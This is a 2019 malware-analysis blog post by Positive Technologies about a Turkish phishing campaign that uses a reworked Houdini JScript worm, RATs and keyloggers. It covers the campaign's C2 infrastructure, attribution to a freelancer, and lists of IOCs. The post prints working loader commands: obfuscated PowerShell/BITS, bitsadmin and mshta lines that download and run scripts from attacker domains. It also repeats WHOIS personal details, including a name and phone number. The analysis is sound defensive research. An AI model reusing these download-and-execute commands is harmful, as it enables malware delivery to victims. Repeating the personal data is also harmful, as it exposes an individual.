December 17, 2019

Turkish tricks with worms, RATs… and a freelancer


The Positive Technologies Expert Security Center has detected a malicious campaign active since at least mid-January 2018. The operation most focused on users from Brazil, Germany, Hungary, Latvia, the Philippines, Turkey, United Kingdom, and the USA. The long operation included use of a number of tools and techniques for infecting and controlling victim PCs. Here we will detail the stages of infection, utilities and network infrastructure used, and the digital traces that put us on the spot as the alleged hacker.

Executive summary

  • Attackers reworked and modernized a 10-year-old worm 
  • Unusual set of tools and extensive network infrastructure
  • The main suspect is a Turkish freelancer

Payload delivery

Office documents

On April 5, 2019, as part of tracking new threats, specialists at the PT Expert Security Center investigated a suspicious Microsoft Office document. The file had the .docm extension (modern Microsoft Word format with support for macros). We also know that it:
  • Was created several days prior to detection (2019-03-31)
  • Contained an image asking the user to enable macros
  • Was created on a Turkish-language system (as indicated by values of metadata fields: "Konu Başlığı" / "Subject Heading" and "Konu Ba l , 1" / "Thread Title, 1"—as translated by Google Translate)
Figure 1. Typical message for tricking victims into enabling macros
The macro code is slightly obfuscated but compact. It uses a Background Intelligent Transfer Management (BITS) PowerShell cmdlet to download and run a JScript script from the attacker's server:
Shell ("pow" & "ershe" & "ll -comm" & "and ""$h1='e';&('i' + $h1 + 'x')('Import-Module BitsTransfer;Start-BitsTransf' + $h1 + 'r https://definebilimi.com/1/b12.js $env:t' + $h1 + 'mp\bb1.js;');Start-Process -WindowStyle hidden -FilePath 'cmd.exe' -ArgumentList '/c %systemroot%\system32\wscript %temp%\bb1.js'""")
The reason for use of PowerShell as well as the unusual module for downloading files from the web server is to evade restrictions on opening and running untrusted programs.

There are some similar documents. One of them is a .doc file (old Microsoft Word format) with Turkish character code page. The macro works in a very similar way:

Shell "cmd.exe /c bitsadmin /transfer myjob /download /priority FOREGROUND https://definebilimi.com/up3e.js %temp%\o2.js & wscript.exe %temp%\o2.js", vbHide

Here the malware author is using the same BITS technique, but now with the help of the legitimate system utility bitsadmin. Note that both the document's creation date and the time of its detection on public sources point to the middle of July 2018. So the attacks have been in progress for around a year, at a minimum. The payload is downloaded from the same attacker server, and the approach to naming the JScript script is similar too.

A different document has the extension .rtf (Rich Text Format). The file has several embedded .xls (old Microsoft Excel format) documents with identical contents. The macro code is completely identical to that from the first document. This, as well as the identical values of the code page and HeadingPairs XML field, suggests a common author.

LNK shortcuts

Not only Office documents were used for initial infection. We found a few malicious .lnk (Windows Shell Link) files that, when run, triggered execution of the following command:

C:\Windows\System32\cmd.exe /c powershell -command "$h1='e';&('i' + $h1 + 'x')('Import-Module BitsTransfer;Start-BitsTransf' + $h1 + 'r https://definebilimi.com/1/b12.js $env:t' + $h1 + 'mp\bb.js;')" & %systemroot%\system32\wscript %temp%\bb.js

The shortcuts were distributed during mid-March and late April 2019.

Their metadata contains the username win7-bilgisayar (in translation from Turkish: "win7-computer"), indicating the user of the system on which the shortcuts were created.

We can state with confidence that phishing emails were the most likely method used for delivering malicious files for initial infection.

The metamorphoses of Houdini

Minor differences aside, all the objects for the initial infection stage download and run the same JScript script. The file is not obfuscated or packed. The only step taken to confound analysis was use of random variable names. The script is a WSH backdoor with the following properties:

  • The C2 address and port are hard-coded.
  • C2 is performed via HTTP POST requests.
  • When the script starts, the string "is-bekle" (in translation from Turkish: "is-ready") is inserted in the URI field.
  • The User-Agent field contains brief information about the system with a script-defined delineator (in this case, "<|>"):
    • Hard disk serial number
    • Username
    • System version
    • Script name
    • Antivirus software name
    • Value of the %ProgramData% environment variable
    • Whether .NET Framework 4.5.2 is installed
    • Wait time between requests
    • Whether Java is installed
  • It checks whether it is running in a Kaspersky Lab sandbox based on the hard disk serial number. If the number is a match, the script stops running.
  • It gets and runs server commands, which include:
    • Downloading a file from the server
    • Uploading a file to the server
    • Stealing the clipboard contents
    • Stealing contents of a folder
    • Getting information on current processes
    • Running commands (cmd.exe)
    • Taking and sending screenshots
    • Extracting and sending stored Chrome and Opera passwords
Figure 2. Beginning of the JScript script downloaded from the attacker server
Based on the comments, code structure, command names, and format for gathering system information, we find parallels with the well-known Houdini VBS worm. In 2013, researchers at FireEye picked apart the functions of Houdini, which handles commands and collects information in a similar way. It would seem that in our case, the attacker borrowed from the well-known worm, rewrote its functions in JScript instead of VBScript, and replaced some English strings with Turkish ones for his convenience.

Figure 3. Handling of JScript backdoor commands
The strings passing the results of command execution contain "Bcorp" in their name. This same combination of letters is present in the name of the C2 server: ip1[.]bcorp.fun.

Attacker's server

According to Shodan as of April 30, 2019, the attacker's host was running an AppServ web server. The server was not locked down very well: for example, the phpinfo page (which displays configuration information of interest) was accessible. Analysis of the URLs used to download malware showed that the server has a public directory (./a) listing the attacker's other tools.

Figure 4. Home page of the attacker's server
 Figure  5. phpinfo page on the attacker's server
Figure 6. Contents of publicly available directory on the attacker's server as of late April 2019

Figure 7. Contents of publicly available directory on the attacker's server as of late May 2019
Here are descriptions of some of the files we found.

Houdini JScript

Most of all, we found a large number of variations on the modified Houdini worm we just looked at. Changes in the script from version to version were small: changes in host names (husan2.ddns.net, ip1.bcorp.fun, ip1.qqww.eu), ports (86, 87), and variable names. Particular commands appeared or disappeared. One version was even embedded in a JScript scriptlet.

Figure 8. Houdini JScript in scriptlet form

Bcorp JAR

This independently created lightweight backdoor, written in Java, uses TCP port 22122 for C2. Capabilities include:

  • Running commands in cmd.exe
  • Determining the OS version
  • Listing catalogs
  • Uploading files
  • Adding itself to the startup items folder and autostart registry key

This appears to be why the modified worm checks for the presence of Java on the system. But it is not clear why an additional backdoor would be needed if the first one has a wide range of functions.

Get-ChromeCreds

This PowerShell wrapper extracts browsing history, usernames, passwords, and cookies from Google Chrome. Some versions contain the library System.Data.SQLite.dll for x86 and x64 systems in base64 encoding; the other versions assume that the library will be present in the %APPDATA% folder. Provided as a plugin component for the main JScript backdoor.

Start-KeyLogger

This PowerShell implementation of a simple container is also provided as a plugin component for the main JScript backdoor.

Figure 9. Code fragment from the PowerShell keylogger

WebBrowserPassView

This utility from Nirsoft grabs usernames and passwords from popular browsers. The attackers used a specially tweaked version, having packed it with ASPack to complicate analysis or bypass signature detection.

NetWire RAT

This publicly available commercial remote administration tool is used by a number of cybercrime groups. In this case, obfuscation was accomplished by packing the RAT in a .NET PE file and applying DeepSea 4.1.

TCP Listen

This bare-bones GUI utility from AllScoop is used to test router and firewall settings. For each listener port it displays a string and ends the connection.

Figure 10. TCP Listen GUI

LNK loader

This tool is similar to the ones described already. When run, it performs the following command:
C:\Windows\System32\cmd.exe /v /c "set i=h&&ms!i!ta http://ip1.qqww.eu/1/f.htm"
In this case the shortcut was created under another user (desktop-amkd3n3).

Script loaders

We have put all the loaders for the already-mentioned RATs in this group. They are all small (less than 1 KB each) and in various formats (such as .htm, .xsl, and .hta). They are written in various languages, both of the scripting variety (JScript, PowerShell) and compiled-on-the-fly (C#). Here are code fragments from a few samples:

Figure 11. Fragment of the .htm loader
Figure 12. Fragment of the .xsl loader
Figure 13. Fragment of the .ps1 loader

Tiny PE loaders

Besides script loaders, we also found .NET PE files. These files, too, were small (up to 10 KB) but with similarly extensive functionality:

Figure 14. Sample of decompiled code from one of the PE loaders

xRAT

An open-source remote administration tool. Many versions and modifications are available publicly. Written in C# with partial obfuscation.

Bcorp panel and builder

Server-side component of the JScript backdoor. It also serves as the builder for the client side. A .NET PE, the component is not obfuscated or packed. The interface resembles that of a tweaked Houdini server. It can send commands plus additional components and plugins to an infected machine: Java environment, PowerShell scripts and Nirsoft utility to grab browser data, PowerShell keylogger scripts, and others. Note that the project is named BcorpRat, as can be seen in the title bar of the window in the following screenshot. The namespace of the source code contains "Btech" in its name—remember this detail for later.

Figure 15. JScript backdoor admin panel: main window
Figure 16. JScript backdoor admin panel: client-side builder window

Network infrastructure

Now we will pay a closer look at the addresses used for interaction with the attacker's malware. We will start with the domain definebilimi.com, with which the Office documents and LNK loaders communicate.

definebilimi.com

The domain changed owners on January 16, 2018. (Incidentally, "define bilimi" means "treasure of science" in Turkish.) Below are some of the most interesting WHOIS tidbits from that time.


Field Value
Registrant Name Koray YAMAN
Registrant Street 123456
Registrant City Istanbul
Registrant Country TR
Registrant Phone +90.5350167352
Registrant Email btech@hotmail.com.tr

It would be hasty to take this information at face value, of course. The indicated country and the frequency of occurrence of traces of the Turkish language in the code allow us to assume that these coincidences are not accidental. And the email address contains "btech," which is a bit of a recurring theme.

The history of NS servers for the domain is interesting:


Data Action Server
17.03.2018 Новая запись buhar.biz
15.01.2019 Смена записи definebilimi.com
04.06.2019 Смена записи qqww.eu

The hosts buhar.biz and qqww.eu have already been encountered in malware.

buhar.us

The history of this domain ("buhar" means "steam" in Turkish) starts on January 16, 2018, the same day as definebilimi.com.


Field Value
Registrant Name balta zar
Registrant Organization BuharuS
Registrant Street Gizli
Registrant City Gizli
Registrant Country TR
Registrant Phone +1.123456789
Registrant Email buharcin@yandex.com

The situation is similar: most of the data looks fake, other than the email address ("buharcin" is Turkish for "steamer").

bcorp.fun

Registered on March 23, 2019. The registration country is (yet again) Turkey and the client organization is "Bcorp." Not to mention that we see "bcorp" in the name of the domain itself—a string that should look familiar by now.

husan2.ddns.net

The attacker used at least one unconventional way to handle hosting. Starting in mid-March 2019, we were able to record use of dynamic DNS servers. Such servers enable attackers to hide their IP addresses and keep their C2 alive for longer. The choice of names was somewhat predictable: a few months later we detected use of husan3.ddns.net, while husan.ddns.net was active as far back as April 2017.

bkorp.xyz

Starting in early April, the hacker registered domains with anonymization from WhoisGuard, Inc., which is located in Panama. Some examples include bkorp.xyz, prntsrcn.com, and i37-imgur.com. The NS servers used link these domains to the other malicious ones.

qqww.eu

This domain—like bcorp.fun—has the subdomain ip1. The registrant (Osbil Technology Ltd.) is supposedly located in Berlin. In reality, a company with the same name is located on the east coast of Cyprus in the city of Famagusta, in the partially recognized Turkish Republic of Northern Cyprus. The company's official site is hosted on a domain that acted as NS server for bcorp.fun from March to May 2019. We did not find any signs of compromise of the name servers. Because of the NS provider's configuration (with the provider's information replacing the client's in the registrant field) client information was hidden from public view.

  Figure 17. Information about the registrant (owner) of qqww.eu  

IP addresses

For a fuller picture, we will give IP addresses with some of the domains corresponding to them at various points in time:
  • 5.255.63.12
    • bcorp.fun
    • husan.ddns.net
    • husan2.ddns.net
    • husan3.ddns.net
    • qqww.eu
  • 192.95.3.137
    • bcorp.fun
    • bkorp.xyz
    • definebilimi.com
    • i36-imgur.com
    • i37-imgur.com
    • i38-imgur.com
    • i39-imgur.com
    • prntsrcn.com
    • qqww.eu
192.95.3.140
  • bkorp.xyz
  • buhar.us

On the trail of the hacker

Among the malicious tools and utilities found on the attacker's server, we uncovered a curious image:

  Figure 18. Image file found on the attacker's web server  




We have not reduced the image size. The image is included here with the exact same dimensions as on the server.

Despite the poor image quality, we were able to establish that this is a screenshot of a transaction page on blockr.io. This was a dead end, but we started to look for any associations with the name of the image file (IMG_JPEG-0371e4dce3c8804f1543c3f0f309cc11.jpg). We uncovered an online scan result for a file that had the same name as the image. The analyzed object was a Windows shortcut similar to the ones discussed previously. Attached was an image containing the photo ID card of a Turkish citizen. The last name on the card (Yaman) matches one found repeatedly in the domain registration records.

Figure 19. ID card found with LNK loader
Scanning of the shortcut in the online sandbox was triggered not by a user uploading a file, but by accessing the following target URL:

hxxps://github.com/btechim/prntsrcn/blob/nm46ny/IMG-0371e4dce3c8804f1543c3f0f309cc11.jpg.lnk?raw=true
The user's Github account is now blocked, but based on the URL we can deduce the user's handle (btechim) and the name of the project (prntsrcn). The project name matches the name of one of the domains used in the campaign (prntsrcn.com). The user handle contains "btech," which we saw in the software for the admin panels described already.

Searching for this same handle put us onto a freelancer hiring site. There we find a page for a freelancer in Turkey who has the same handle, along with confirmed phone number, mailing address, and Facebook profile. He is offering his services in the area of software development and cybersecurity.

  Figure 20. The suspected attacker's page on a freelancer hiring site  

Conclusions

Positive Technologies tracked this malicious campaign of Turkish origin for several months. It is rare to see a single series of attacks combining both modern techniques and modified 10-year-old tools. The attacker employed a wide range of tools of diverse purpose, platform, and sophistication to obtain total control over victim PCs. He used a wide range of techniques to hide his identity when establishing network infrastructure. But it was not possible to account for everything—and so pride and a few slipups ultimately gave away the game. The research was sent to the Turkish Information Security Incident Response Center.

Author: Alexey Vishnyakov, Positive Technologies

IOCs

Office loaders

3305720da73efbcb7d25edbb7eff5a1a
5b6d77f3e48e7723498ede5d5ba54f26
621a0133e28edec77a2d3e75115b8655
712e7ec49ad3b8c91b326b6d5ee8dcd8
731a3d72e3d36c2270c1d0711c73c301
929374b35a73c59fe97b336d0c414389

LNK loaders

3bc5d95e2bd2d52a300da9f3036f5b3b
527069e966b4a854df35aef63f45986a
a4667e0b3bfaca0cda5c344f1475b8e0

Houdini JScript

04c2ad67de2cea3f247cf50c5e12e969
5ab9176b9ed9f7a776ec82c412a89eab
84f0d098880747f417703f251a2e0d1c
94c6ba0d812b4daf214263fffc951a20
a52509a38846b55a524019f2f1a06ade
bf2fb6cdbc9fde99e186f01ad26f959f
c871091ce44594adbd6cf4388381e410
daf6a9eb55813d1a151695d33506179d
f010af1b330d00abb5149e9defdae6ee
ff924faeb9dfd7384c05abe855566fc9

Bcorp JAR

59978b5a9e4ab36da0f31a8f616cc9d3
a7219da3b0c0730c476fe340dbf7e4e5
ddac55213089da9ef407bce05ebe653e

Get-ChromeCreds

11769e9f49123a2af00bd74453221c07
1a81c9119d7761535c198ddb761979b8
42a85849a591e65b0254d9bcbdf59f82
8e49263f33c53ee5bc91bebbf9617352
c9ab090ad2badb9862fd5b6058428096

Start-KeyLogger

55daa84475a11ea656183e0ad5ccc608
aa82fbb6a341d71d2431b6d2ebca027c

WebBrowserPassView

7722e086cf7ed59955a1d6ec26f49cf3

NetWire RAT

1470a08bd427bb8738a254ba4f130ff5
5f8495016773c7834b1c588f0997a6c4

TCP Listen

913567da98185cad9f91a570dc298de1

Script loaders

02946d10c6a34fe74826f3c0b0a6a3e0
1ad644bdba488a6e42ad76aea2c0ee54
3a2dcf36b9206a135daa73c645a3f56f
4dddd87d3cb80145c9859fd76dfef794
74c5e5be9f79bd9e7ee84fd046c14e68
78f4d5fa6c68dae4b03860b54ec6cc67

Tiny PE loaders

0f3c56018a7051aebe060454fc981f5b
1b9cefc229daddc4557cea0e3bdf4656
29e6679107bd9c72aa061371082206bb
b66b7395825b9ed656b768d4e7fe1de7
fbc606b8b04e51ddb342e29b84ac1edb

xRAT

2e9a0637478938cc3e4519aa7b4219cc
7c67c93ba243be32e5fd6a6921ceded3

Bcorp panel and builder

405c987ba1a8568e2808da2b06bc9047
c3ac8b7a7c8c0d100e3c2af8ccd11441

Bcorp C2

bcorp.fun
bkorp.xyz
buhar.us
definebilimi.com
husan.ddns.net
husan2.ddns.net
husan3.ddns.net
i36-imgur.com
i37-imgur.com
i38-imgur.com
i39-imgur.com
prntsrcn.com
qqww.eu
5.255.63.12
192.95.3.137
192.95.3.140

No comments:

Post a Comment